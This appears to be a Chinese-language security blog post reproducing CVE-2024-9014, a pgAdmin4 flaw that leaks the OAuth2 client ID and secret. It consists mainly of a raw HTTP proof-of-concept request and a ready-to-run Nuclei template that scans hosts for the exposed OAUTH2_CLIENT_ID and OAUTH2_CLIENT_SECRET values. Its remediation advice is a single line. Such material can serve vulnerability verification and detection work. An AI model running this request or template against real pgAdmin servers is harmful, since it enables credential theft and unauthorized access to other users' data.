【漏洞复现】pgAdmin4 敏感信息泄露漏洞（CVE-2024-9014）

紫色皓月 皓月的笔记本 2024-10-03 18:00

声明：请勿将文章内的相关技术用于非法目的，如有相关非法行为与文章作者和本公众号无关。

0X01 
简介

pgAdmin4 是 PostgreSQL 的官方图形界面管理工具，为数据库管理员、开发者和分析师提供了一个直观的界面，以便于管理和维护 PostgreSQL 数据库。无论你是新手还是有经验的专家，pgAdmin4 都为你提供了丰富的功能来简化 PostgreSQL 的日常任务。

CVE-2024-9014 pgAdmin 4 OAuth2 client ID与secret敏感信息泄漏漏洞。攻击者可构造恶意请求获取客户端ID和密钥，从而导致未经授权访问其他用户数据。

漏洞编号：

CVE-2024-9014

影响范围：

pgAdmin4 <= 8.11

复现环境：

pgAdmin4 8.10

0X02 
漏洞复现

POC：

GET /login?next=/ HTTP/1.1
Host: 192.168.31.135:5050
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive

Nuclei：

id: pgAdmin4-minganxinxixielou-CVE-2024-9014

info:
  name: pgAdmin4 敏感信息泄露漏洞 CVE-2024-9014
  author: 紫色皓月
  severity: high
  description: pgAdmin4 敏感信息泄露漏洞 CVE-2024-9014
  tags: CVE-2024-9014,pgAdmin4,2024,敏感信息泄露漏洞

requests:
  - raw:
    - |
      GET /login?next=/ HTTP/1.1
      Host: {{Hostname}}
      Cache-Control: max-age=0
      Upgrade-Insecure-Requests: 1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      Accept-Encoding: gzip, deflate, br
      Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
      Connection: keep-alive

    req-condition: true
    matchers:
      - type: word
        words:
          - 'OAUTH2_CLIENT_ID'
          - 'OAUTH2_CLIENT_SECRET'
        condition: and

0X03 修复建议

升级至安全版本！

0X04 写在最后

回复“加群”，获取群号。

侵删！